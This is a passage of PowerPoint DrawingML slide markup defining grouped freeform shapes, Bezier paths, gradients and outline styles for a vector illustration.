                            <a:pt x="137" y="75"/>
                            <a:pt x="138" y="81"/>
                            <a:pt x="138" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="141" y="109"/>
                            <a:pt x="148" y="149"/>
                            <a:pt x="159" y="203"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="165" y="231"/>
                            <a:pt x="198" y="218"/>
                            <a:pt x="192" y="194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50000">
                          <a:schemeClr val="bg1">
                            <a:gamma/>
                            <a:shade val="85882"/>
                            <a:invGamma/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="bg1"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="0" scaled="1"/>
                    </a:gra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44" name="Freeform 2195">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56083C7-51AD-413A-B181-477C75C9512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4745" y="1392"/>
                      <a:ext cx="88" cy="55"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 29 w 66"/>
                        <a:gd name="T1" fmla="*/ 39 h 41"/>
                        <a:gd name="T2" fmla="*/ 9 w 66"/>
                        <a:gd name="T3" fmla="*/ 23 h 41"/>
                        <a:gd name="T4" fmla="*/ 15 w 66"/>
                        <a:gd name="T5" fmla="*/ 13 h 41"/>
                        <a:gd name="T6" fmla="*/ 53 w 66"/>
                        <a:gd name="T7" fmla="*/ 16 h 41"/>
                        <a:gd name="T8" fmla="*/ 57 w 66"/>
                        <a:gd name="T9" fmla="*/ 30 h 41"/>
                        <a:gd name="T10" fmla="*/ 29 w 66"/>
                        <a:gd name="T11" fmla="*/ 39 h 4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66" h="41">
                          <a:moveTo>
                            <a:pt x="29" y="39"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="14" y="37"/>
                            <a:pt x="0" y="25"/>
                            <a:pt x="9" y="23"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="16" y="21"/>
                            <a:pt x="13" y="16"/>
                            <a:pt x="15" y="13"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="18" y="10"/>
                            <a:pt x="53" y="0"/>
                            <a:pt x="53" y="16"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="53" y="21"/>
                            <a:pt x="47" y="25"/>
                            <a:pt x="57" y="30"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="66" y="33"/>
                            <a:pt x="46" y="41"/>
                            <a:pt x="29" y="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45" name="Oval 2196">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B82591F-F59C-4121-9B19-510A0D86E32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gray">
                    <a:xfrm flipH="1">
                      <a:off x="4733" y="1323"/>
                      <a:ext cx="106" cy="105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 w="6350" algn="ctr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312" name="Group 2197">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F6C99E-F7F1-410B-A4E5-2E699F23DD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475" y="2241"/>
                <a:ext cx="192" cy="351"/>
                <a:chOff x="2847" y="2560"/>
                <a:chExt cx="192" cy="351"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2313" name="Freeform 2198">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACB5208-21C1-42EA-8A82-F5720340E2B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 flipH="1">
                  <a:off x="2847" y="2560"/>
                  <a:ext cx="192" cy="351"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 905"/>
                    <a:gd name="T1" fmla="*/ 244 h 1649"/>
                    <a:gd name="T2" fmla="*/ 0 w 905"/>
                    <a:gd name="T3" fmla="*/ 1649 h 1649"/>
                    <a:gd name="T4" fmla="*/ 905 w 905"/>
                    <a:gd name="T5" fmla="*/ 1406 h 1649"/>
                    <a:gd name="T6" fmla="*/ 905 w 905"/>
                    <a:gd name="T7" fmla="*/ 0 h 1649"/>
                    <a:gd name="T8" fmla="*/ 0 w 905"/>
                    <a:gd name="T9" fmla="*/ 244 h 16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05" h="1649">
                      <a:moveTo>
                        <a:pt x="0" y="244"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1649"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="905" y="1406"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="905" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="24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2314" name="Group 2199">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6513EE-6BBF-45CD-BEEF-4C7335E552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882" y="2631"/>
                  <a:ext cx="135" cy="63"/>
                  <a:chOff x="2882" y="2631"/>
                  <a:chExt cx="135" cy="63"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2327" name="Group 2200">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{314E3578-96E0-451B-9CF2-AD0E39637F4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53" y="2644"/>
                    <a:ext cx="64" cy="50"/>
                    <a:chOff x="1315" y="1508"/>
                    <a:chExt cx="596" cy="469"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2329" name="Freeform 2201">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A14784-15EB-4398-A07D-1462998CE3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0C080C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30" name="Freeform 2202">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7543720-AC4E-43BF-BE52-7C75B3DE0C3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0C080C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31" name="Freeform 2203">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87992CE-9539-4964-A588-EED5D2C8383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0C080C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2328" name="Freeform 2204">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCBA43B5-CA03-44A6-87DB-2AEE824638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882" y="2631"/>
                    <a:ext cx="50" cy="43"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 210"/>
                      <a:gd name="T1" fmla="*/ 56 h 180"/>
                      <a:gd name="T2" fmla="*/ 210 w 210"/>
                      <a:gd name="T3" fmla="*/ 180 h 180"/>
                      <a:gd name="T4" fmla="*/ 0 w 210"/>
                      <a:gd name="T5" fmla="*/ 124 h 180"/>
                      <a:gd name="T6" fmla="*/ 0 w 210"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 209 w 210"/>
                      <a:gd name="T9" fmla="*/ 56 h 1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0" h="180">
                        <a:moveTo>
                          <a:pt x="209" y="56"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="210" y="180"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="124"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="209" y="5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6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="1B171B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315" name="Group 2205">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486F555F-3B69-4656-8587-F9A2917ECD7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882" y="2715"/>
                  <a:ext cx="135" cy="63"/>
                  <a:chOff x="2882" y="2715"/>
                  <a:chExt cx="135" cy="63"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2322" name="Group 2206">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E3C70B3-2A8D-45C0-A450-E7FB622B1C8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53" y="2728"/>
                    <a:ext cx="64" cy="50"/>
                    <a:chOff x="1315" y="1508"/>
                    <a:chExt cx="596" cy="469"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2324" name="Freeform 2207">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5AA18E-EB7A-4EEE-ADD1-805D5F41F58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0C080C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25" name="Freeform 2208">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B8DA81F-B321-4051-86D1-7333B1247BD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0C080C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26" name="Freeform 2209">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3F2E17-0E77-46F0-BB06-824BAA9D766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0C080C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2323" name="Freeform 2210">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09FC30A-E220-401A-A8FF-7157CB013D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882" y="2715"/>
                    <a:ext cx="50" cy="43"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 210"/>
                      <a:gd name="T1" fmla="*/ 56 h 180"/>
                      <a:gd name="T2" fmla="*/ 210 w 210"/>
                      <a:gd name="T3" fmla="*/ 180 h 180"/>
                      <a:gd name="T4" fmla="*/ 0 w 210"/>
                      <a:gd name="T5" fmla="*/ 124 h 180"/>
                      <a:gd name="T6" fmla="*/ 0 w 210"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 209 w 210"/>
                      <a:gd name="T9" fmla="*/ 56 h 1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0" h="180">
                        <a:moveTo>
                          <a:pt x="209" y="56"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="210" y="180"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="124"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="209" y="5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6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="1B171B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316" name="Group 2211">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37443193-830E-484F-B861-122239A9D3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882" y="2798"/>
                  <a:ext cx="135" cy="64"/>
                  <a:chOff x="2882" y="2798"/>
                  <a:chExt cx="135" cy="64"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2317" name="Group 2212">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60AB7E8C-8154-4E3C-8E97-E33A634EA09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53" y="2811"/>
                    <a:ext cx="64" cy="51"/>
                    <a:chOff x="1315" y="1508"/>
                    <a:chExt cx="596" cy="469"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2319" name="Freeform 2213">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90263DF2-220B-4DE0-8FA6-3DF8892D618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0C080C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20" name="Freeform 2214">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88D3D06-EE1B-446A-86E7-6AB0A7D53A0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0C080C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21" name="Freeform 2215">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{917E3EA4-5C26-4814-A379-BF5A8C91683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0C080C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2318" name="Freeform 2216">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E949CF0E-5ED4-461B-9842-0AA7021CC4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882" y="2798"/>
                    <a:ext cx="50" cy="43"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 210"/>
                      <a:gd name="T1" fmla="*/ 56 h 180"/>
                      <a:gd name="T2" fmla="*/ 210 w 210"/>
                      <a:gd name="T3" fmla="*/ 180 h 180"/>
                      <a:gd name="T4" fmla="*/ 0 w 210"/>
                      <a:gd name="T5" fmla="*/ 124 h 180"/>
                      <a:gd name="T6" fmla="*/ 0 w 210"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 209 w 210"/>
                      <a:gd name="T9" fmla="*/ 56 h 1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0" h="180">
                        <a:moveTo>
                          <a:pt x="209" y="56"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="210" y="180"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="124"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="209" y="5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6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="1B171B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2074" name="Group 2278">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9B2C116-C883-445E-AFD3-DFEE936EEFB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684192" y="2370138"/>
              <a:ext cx="642938" cy="192087"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2307" name="Freeform 2279">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9D0E1A-5EC8-4D2C-B085-9B2E7987908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28" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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308" name="Freeform 2280">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55908E87-D1FD-4B37-84F5-EB9E7D34D80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924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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309" name="Freeform 2281">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF638A77-771C-4A6D-9D10-EF68B3563A1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518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134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310" name="Freeform 2282">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FEE64B7-BEEF-4692-B48A-4B1FD272E80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28" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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075" name="Group 2303">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6134DC48-33CE-4167-8A8A-28E0FC5C2B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65155" y="1566863"/>
              <a:ext cx="627062" cy="641350"/>
              <a:chOff x="2494" y="1923"/>
              <a:chExt cx="1109" cy="1134"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2295" name="Freeform 2304">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B255C58D-5AA6-426D-9450-1685BF11C87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71" y="1937"/>
                <a:ext cx="73" cy="855"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 165 w 165"/>
                  <a:gd name="T1" fmla="*/ 0 h 1918"/>
                  <a:gd name="T2" fmla="*/ 165 w 165"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1918"/>
                  <a:gd name="T4" fmla="*/ 0 w 165"/>
                  <a:gd name="T5" fmla="*/ 1918 h 1918"/>
                  <a:gd name="T6" fmla="*/ 0 w 165"/>
                  <a:gd name="T7" fmla="*/ 42 h 1918"/>
                  <a:gd name="T8" fmla="*/ 165 w 165"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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5" h="1918">
                    <a:moveTo>
                      <a:pt x="165" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42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80808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96" name="Freeform 2305">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EBD91F-2B97-47A2-B7A0-F10F27787CE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52" y="2208"/>
                <a:ext cx="51" cy="849"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 114"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 114"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1904"/>
                  <a:gd name="T4" fmla="*/ 114 w 114"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 114 w 114"/>
                  <a:gd name="T7" fmla="*/ 31 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 114"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114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696"/>
              </a:solidFill>
              <a:ln w="14351" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="969696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97" name="Freeform 2306">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8185093D-B46A-4FA1-A76C-45495E18F7C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20" y="1943"/>
                <a:ext cx="51" cy="849"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 113"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 113"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1904"/>
                  <a:gd name="T4" fmla="*/ 113 w 113"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 113 w 113"/>
                  <a:gd name="T7" fmla="*/ 28 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 113"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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3" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="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80808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298" name="Group 2307">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030EC714-8B00-447A-B7F9-02D40509C9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4" y="2030"/>
                <a:ext cx="908" cy="377"/>
                <a:chOff x="806" y="1728"/>
                <a:chExt cx="2036" cy="845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2303" name="Freeform 2308">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C89F018D-6AA9-4549-AE9D-C098C86831E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806" y="1728"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 73 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 545 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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14351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304" name="Freeform 2309">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591ACA52-CA5B-4FB6-AC52-1BC4993868A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806" y="1801"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 76 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 548 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="5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14351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305" name="Freeform 2310">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2B7DBCB-9919-4878-B60F-05A4D174CE9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806" y="1877"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
